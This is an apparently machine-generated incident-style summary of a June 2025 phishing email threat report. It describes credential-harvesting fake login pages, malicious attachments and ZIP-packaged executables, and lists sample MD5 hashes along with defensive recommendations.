Full Report
This report provides the distribution quantity, statistics, trends, and case information on phishing emails and email threats collected and analyzed for one month in June 2025. The following are some statistics and cases included in the original report. 1) Statistics of Phishing Email Threats As of June 2025, the most prevalent type of threat among […]
Analysis Summary
# Incident Report: June 2025 Phishing Email Threat Analysis
## Executive Summary
This report summarizes threat intelligence derived from analyzing phishing email activity throughout June 2025, where phishing emails comprised 66% of all analyzed threats. Attackers primarily used HTML scripts or embedded hyperlinks in documents (like PDFs) to direct victims to credential-harvesting fake login pages or deliver malware via malicious attachments (Scripts, Documents, or ZIP archives containing PEs). The primary impact is credential compromise and malware distribution, necessitating continuous user education and security control updates.
## Incident Details
- **Discovery Date:** Analysis conducted throughout June 2025 (Ongoing monitoring)
- **Incident Date:** June 2025 (Period of analysis for reported trends)
- **Affected Organization:** Not specified (Trend analysis across multiple sources)
- **Sector:** General (Across various organization types targeted by email threats)
- **Geography:** Not specified (Though Korean language phishing cases were analyzed)
## Timeline of Events
The timeline reflects the typical lifecycle of email-borne threats observed during the analysis period:
### Initial Access
- **Date/Time:** Throughout June 2025
- **Vector:** Email phishing, specifically using attachments (Scripts, Documents, Compressed files) or malicious hyperlinks embedded in documents.
- **Details:** Threat actors used HTML scripts mimicking legitimate login/promotional pages (logos, fonts) to harvest credentials on fake websites or distributed malware via attachments.
### Lateral Movement
- *Not detailed in the context provided, as the focus is on initial delivery and credential harvesting.*
### Data Exfiltration/Impact
- **Details:** Successful credential harvesting sent information to threat actor C2 servers or resulted in the execution of malware (FakePage malware delivered via Document or Script attachments, or PE files delivered via ZIP archives).
### Detection & Response
- **Detection:** Threats were identified through ongoing security monitoring and analysis of reported samples (ATIP analysis).
- **Response Actions:** Analysis included identifying attachment types, C2 addresses, and malicious file hashes (MD5s provided below), facilitating defense updates.
## Attack Methodology
- **Initial Access:** Phishing emails containing malicious scripts or documents with 'VIEW HERE' hyperlinks.
- **Persistence:** *Not detailed.*
- **Privilege Escalation:** *Not detailed.*
- **Defense Evasion:** Using scripts formatted to perfectly mimic legitimate login screens; compressing executables (PEs) within ZIP files to potentially bypass simple endpoint scanning.
- **Credential Access:** Deploying **FakePage** malware via script attachments or hyperlinks in documents to capture credentials entered by users on fake login portals.
- **Discovery:** *Not detailed.*
- **Lateral Movement:** *Not detailed.*
- **Collection:** Gathering user credentials.
- **Exfiltration:** Sending harvested credentials to attacker C2 servers.
- **Impact:** Credential theft and execution of malware (PE files).
## Impact Assessment
- **Financial:** *Not specified.*
- **Data Breach:** Credentials (account access) were the primary target/exposure.
- **Operational:** Potential disruption dependent on the success rate of malware execution or subsequent unauthorized system access.
- **Reputational:** *Not specified.*
## Indicators of Compromise
*Note: As this is a threat intelligence report summary, specific external C2 domains were not provided or need to be defanged if supplied.*
- **Network indicators:** C2 addresses mentioned, but specifics require consulting the original report.
- **File indicators (Sample MD5 Hashes from the report):**
- 0b8ccb3c3156659dcfc873a3ed7a6932
- 17ad811df3fce5d582c8f85b6d388884
- 1bac5e9901105a62cb7d98a82c02b9d7
- 1c7b665d471b04b38061295f0eb28f62
- 1eb436524511236fc33ea53162812248
- **Behavioral indicators:** Use of HTML scripts to spoof login pages; embedding hyperlinks in PDFs/Documents directing users to external sites; distribution of PE files inside ZIP archives.
## Response Actions
Specific response actions for *individual* compromises were not detailed, but general mitigation involves:
- **Containment:** Blocking known malicious file hashes and C2 infrastructure identified during triage.
- **Eradication:** Removing malware payloads from infected systems (if any were successfully executed).
- **Recovery:** Resetting credentials potentially exposed via successful phishing attempts.
## Lessons Learned
- Phishing remains the most prevalent email-borne threat (66% prevalence).
- Attackers effectively utilize common document formats (PDFs, DOCs) to hide malicious hyperlinks leading to credential harvesting sites (FakePages).
- There is a growing trend of packaging executable files (PEs) within standard ZIP archives for delivery.
- Analyzing frequently used attachment titles and Korean keywords can help preemptively tune defenses.
## Recommendations
- **Email Gateway Hardening:** Enhance filtering capabilities for emails containing embedded hyperlinks within document attachments.
- **User Training:** Conduct targeted training focused specifically on recognizing highly-realistic spoofed login pages (HTML/CSS mimicry) and the dangers of clicking links inside seemingly benign documents (PDFs, Word files).
- **Endpoint Protection:** Ensure endpoint detection and response (EDR) is capable of inspecting content within compressed archives (ZIP) for executable files before they are extracted and run.
- **Credential Hygiene:** Enforce multi-factor authentication (MFA) ubiquitously, as it mitigates the direct impact of credential harvesting.